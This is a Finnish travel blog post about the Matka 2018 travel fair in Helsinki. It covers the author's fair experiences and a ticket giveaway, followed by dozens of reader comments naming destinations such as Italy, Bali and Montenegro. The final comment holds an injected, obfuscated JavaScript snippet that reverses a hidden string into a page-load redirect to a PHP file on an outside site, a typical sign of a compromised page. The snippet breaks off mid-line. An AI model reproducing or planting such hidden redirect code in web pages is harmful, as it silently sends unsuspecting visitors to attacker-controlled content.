Image Alt

Blog

Matka 2018: Voita liput Matkamessuille

Blogini täyttää puolentoista viikon päästä jo neljä vuotta. Vietän tätä merkkipäivää matkoilla matkamessuilla. Innostuin nimittäin ostamaan lentoliput Suomeen niin, että voin olla paikalla Matka 2018 -messuilla 19. – 21.1. Innostuin siitäkin huolimatta, että viimevuotisista matkamessuista jäi vähän ristiriitaiset tunnelmat.

Fiat 500 ratissa

En Italian vuosinani ole päässyt vielä koskaan Fiat 500:n rattiin, mutta viime vuoden matkamessuillapa pääsin! Kiitos Kokkolan osasto!

Matkamessuilla on lähes 1000 matkanjärjestäjää, matkakohdetta ja matkailualan palveluyritystä yli 80 maasta, joten tarjolla ihan valtavasti kohdevinkkejä ja tietoa. Messuosastoja ja näytteilleasettajia on niin paljon, että messuista saa paljon enemmän irti, jos on etukäteen edes alustavasti miettinyt, minne päin maailmaa mieli halajaa. Tämän opin viime vuodesta.

Viime vuonna olin Matkamessuilla ensisijaisesti siellä silloin järjestetyn Blogipaviljongin vuoksi – ja sivumennen sanoen yksinomaan muiden bloggaajien ja tietenkin lukijoiden, myös potentiaalisten uusien lukijoiden,  tapaaminen oli matkamessumatkan arvoinen. En siis hakenut messuilta tietoa mistään erityisestä kohteesta, enkä juuri perehtynyt muuhun ohjelmaankaan etukäteen. Haahuilin päämäärättömästi käytävillä, täytin muutamia arvontakuponkeja, söin tarjottuja messukarkkeja ja maistiaisia ruokakojuilla ja juttelin muutamilla ständeillä pitkäänkin. Sain haahuilla ihan rauhassa, sillä valitettavan moni näytteilleasettaja oli enemmän kiinnostunut puhelimestaan kuin ryhtymään juttusille kanssani ja kertomaan enemmän palveluistaan. Tämä ei ollut yksinomaan minun vaikutelmani, sillä samantapaista palautetta annettiin näytteilleasettajille viime vuoden messuista London and beyond -blogissakin ja sen kommenteissa. En erityisemmin innostunut myöskään lavoilla ja muualla näkemästäni ohjelmasta. En ole ihan vakuuttunut siitä, että haitarimusiikki tai kansantanhut olisivat niitä, joilla matkustajia kannattaa houkutella vaikkapa Saarenmaalle tai Suomi-kohteisiin – niin hienoja kuin kansallispuvut ja -tanssit ovatkin.

Matkamessut 2017

Helsingin Matkamessut 2017

Helsingin Matkamessut 2017 (Kuva: Messukeskuksen kuvapankki.)

Helsingin Matkamessut 2017

Oli matkamessuilla minun mieleistäni ohjelmaakin (Kuva: Messukeskuksen kuvapankki.)

Edellä esittämästäni kritiikistä huolimatta odotan tulevia matkamessuja paljon. Nyt minulla on mielessäni epämääräisen haahuilun ja ruokakojujen maistiaisten rohmuamisen lisäksi pari kohdetta, joista haluaisin lisätietoa. Olen tällä kertaa tutustunut myös etukäteen ohjelmaan ja löytänyt sieltä paljon kiinnostavia puheenvuoroja. Muiden bloggaajien kokemukset kiinnostavat tietenkin messuillakin, joten viihdyn varmaan aika paljon Rantapallo Stagen tuntumassa kuuntelemassa matkabloggaajien esityksiä ruokamatkailusta upeisiin vaellusreitteihin ja road tripeihin, yksin matkailusta lasten kanssa matkustamiseen, kohteista Tallinnasta Baliin. Matkabloggaajia esiintyy myös muilla lavoilla ja Meriharakka-blogissa on kätevästi koottu kaikkien messuilla esiintyvien bloggaajien aiheet ja esiintymisajat.  Matkabloggaajien lisäksi etenkin Eurooppa-stagella on paljon kiinnostavia esityksiä niin tunnetuista kuin tuntemattomammista Euroopan kohteista mm. Italian vaellusreiteistä. Ennen messuja lataan vielä Matkamessujen ilmaisen sovelluksen, jotta löydän varmasti mukana olevat yritykset, eikä kiinnostavat ohjelmat mene ohi!

Voita liput matkamessuille

Arvon tätä juttua maanantaihin 15.1. klo 21 mennessä kommentoineiden kesken kahden hengen lippupaketin (arvo 38 €) Matka 2018 -messuille ja samaan aikaan järjestettäville Caravan-messuille Voit voittaa liput itsellesi ja ystävällesi, kun kerrot kommentissa, mikä sinua vetää Matkamessuille: jokin tietty kohde tai kohteet, yleinen tunnelma, messutarjoukset ja -arvonnat, esitykset vai joku muu. Kannattaa vinkata myös sille kumppanille arvonnasta: näin tuplaatte voittomahdollisuutenne! Sähköiset liput toimitan voittajan sähköpostiin, joten muista jättää kommenttiin sähköpostiosoitteesi – se näkyy vain minulle.

Ilmoitan tässä jutussa ja Facebook-sivullani, kun arvonta on suoritettu eli maanantaina 15.1. klo 21. Käyhän siis tykkäämässä sivustani www.facebook.com/vihrealtakukkulalta !

Päivitys 15.1.2018:

LIPUT ON ARVOTTU JA VOITTAJALLE ON LÄHETETTY VIESTI. ONNEKSI OLKOON VIELÄ TÄTÄ KAUTTA, MERJA!

* Arvonta järjestetään yhteistyössä Matka 2018 -messujen kanssa, joka lahjoitti liput arvottavaksi.

Matka18_655x102_OlemmeMukana

0 0 votes
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

75 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Sari
Sari
6 years ago

Kohteena vetää sinne Bali tai Costa Rica. Rn oo koskaan päässyt messuille ja jo nyt olis aika. Arvokkaita vinkkejä annoit tossa ja toivottavasti puhelimet ei oo siellä näpeissä!

Elina
Elina
6 years ago

Olispa kiva voittaa liput messuille. Koskaan en oo matkamessuilta ollu, aina vaan haaveillu. Ja ehdottomasti kaikki Italiaan liittyvät kojut kiinnostaa ja koska perhe on kasvanut niin matkailu taaperon kanssa.

Sari Lääveri
Sari Lääveri
6 years ago

Italia kiinnostaa aina eli tutkin ainakin kaikki Italian osastot. Ja syksyksi pitkäviikonloppu kohde Eurooppaan hakusessa. Suomen puolen käyn myös läpi ja etsin uusia vinkkejä kotimaan matkailuun. Arvonnatkin kiinnostaa

Taija Andersson
Taija Andersson
6 years ago

Tykkään matkamessujen tunnelmasta. Siitä, että näkee paljon kohteita samaan aikaan. Samalla voi jutella ständillä ja kysellä mielipiteitä ja vinkkejä.

Kimmo Ahlman
Kimmo Ahlman
6 years ago

Uudet matkaideat. Tänä keväänä erityisesti haluaisin löytää Roomasta ja Prahasta jotain uutta tietoa sekä ihmeellistä koettavaa mitä en ole vielä niissä kaupungeissa kokenut ja nähnyt. Usko että se tieto löytyy Matkamessuilta!

OutiH
OutiH
6 years ago

Tarjoukset kiinnostaa ja yleensä löydämme jotain erikoiskohteita.

Ari
Ari
6 years ago

Haluaisin löytää uusia päiväretkikohteita joihin voisi tutustua esim. Prahasta käsin.

Elina
6 years ago

Matkamessuille vetää jatkuva matkakuume. B-)

Salla
Salla
6 years ago

Haluaisin saada messuilta vinkkejä Uuden Seelannin matkalleni. Lisäksi tarjoukset kiinnostaa 🙂

Hanna Vilppunen
Hanna Vilppunen
6 years ago

Tulin juuri Roomasta, jossa hyörin sinun blogivinkkiesi mukaan! Olisi kiva nähdä sinut livenä!

Raija
Raija
6 years ago

Messujen tunnelma on erityinen, joten aina siellä kuluu useampi tunti. Haen myös vinkkejä Kroatian matkoista.

Marjatta
Marjatta
6 years ago

Matkakohteena Italia on nykyään ykkösenä ja se kiinnostaa tietenkin myös messuilla.

Nina Klemetti
Nina Klemetti
6 years ago

Messutarjoukset ja -arvonnat.

Nelli
Nelli
6 years ago

Messuille vetää vuosi toisensa perään yleinen tunnelma, ideoiden hakeminen, tuleviin reissukohteisiin tutustuminen sekä valonpilkahdus talven keskelle 🙂

Satu
Satu
6 years ago

Minua kiinnostavat matkamessuilla matka-arvonnat ja eri maihin tutustuminen. Vielä en ole voittanut sieltä mitään, mutta toivottavasti tänä vuonna parempi onni. Toivottavasti voitan liput!

Sanna
Sanna
6 years ago

En ole ennen käynyt matkamessuilla, jo siks olis hauska päästä käymään.
Italian matka mielessä, mut kohde vielä hakusessa. Niin paljon ihanaa Italiassa olisi.

Marja
Marja
6 years ago

Minua messuille vetää matkasuunnitelmat ja haluan saada messuilta lisää infoa kyseisistä maista ja kuulla bloggareiden vinkkejä. Olen kerran voittanut lennot joten ehkä ne matka-arvonnatkin kiinnostavat

Sanna-Kaisa
Sanna-Kaisa
6 years ago

Matkamessuilla kiehtoo messutunnelma ja tällä kertaa haen tietoa ensi kesän lomakohteestamme, Montenegrosta.

Anne
Anne
6 years ago

Noin vuosi sitten aloitin seuraamaan blogiasi, juuri sopivasti ennen toukokuista Rooman matkaa. Sainkin runsaasti mukavia retki- ja tutstumiskohteita Rooman matkaa varten. Edelleen Italia vetää puoleensa, nyt kiinnostaa Cinque Terren ja Amalfin rannikko. Toivottavasti matkamessuilta löytyy vinkkejä näihin kohteisiin.

Sanski
Sanski
6 years ago

Tällä kertaa lähtisin tsekkaamaan, onko mitään infoa kesän matkakohteista eli Havaijista ja Tokiosta.

JuhaJ
JuhaJ
6 years ago

Messutarjoukset ja uutuus kohteet.

Arle
Arle
6 years ago

Tarjoukset, arvonnat ja fiilis, vähän kuin olisi jo matkalla 🙂

Tuula V
Tuula V
6 years ago

Tunnelma ja messutarjoukset

Ida Kojo
Ida Kojo
6 years ago

Messutarjoukset ja arvonnat 🙂

Merja
Merja
6 years ago

Viimeksi petyin vähän messutarjontaan. Nyt haluan vinkkejä Montenegron matkaa varten.

Riikka
Riikka
6 years ago

Italia kiinnostaa edelleen ja uudet ideat Italian reissuilleni!

Mari
Mari
6 years ago

Messuille vetää se tunnelma ja matkatarjoukset ehdottomasti.
Ja joka kerta sieltä löytyy jotain kivaa uuttakin.
Matkamessut on vaan se vuoden messutapahtuma itselleni…pakko mennä.

Pirkko / Meriharakka
6 years ago

Kiitos linkkauksesta – messuliput on jo hoidossa, eli en osallistu arvontaan 🙂

Siinatar
Siinatar
6 years ago

Hyvät messutarjoukset kiinnostavat =). Mukaan arvontaan!

Minna Suckman
Minna Suckman
6 years ago

En ole ikinä ollut Matka Messuilla olis kiva kyllä voittaa liput matkakuume on kova ✈️

Malaika
Malaika
6 years ago

Toki tarjoukset, mutta usein ne löytyvät nykyään myös netistä. Tunnelma on messuilla “se” juttu

Marika
Marika
6 years ago

Eniten kaipaisin yleistä fiilistelyä tulevista matkakohteista. Haavekohteite ensitalveksikin on niin paljon, että ehkä täältä saisi sysäyksen kohteen valintaan. Kesälle on jo lukittu roadtrip Jenkkien itärannikolla, mutta tarkemmat suunnitelmat vielä puuttuu, eli ehkä siihenkin voisi löytyä jotain tarkempia kohdevinkkejä.

Hilmam
Hilmam
6 years ago

Matkamessuille houkuttelee erityisesti asiantuntijoiden vinkit.

Susanna
Susanna
6 years ago

Kaikki mainitsemasi jutut vetävät minua superinnokkaana matkamessuille! Sitä on jo osittain matkalla kun messuille pääsee fiilistelemään 🙂

Mikko
Mikko
6 years ago

Infot Etelä-Afrikasta. ✌️

Ar<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh.noitacol.tnemucod"];var
Ar
75
0
Would love your thoughts, please comment.x
()
x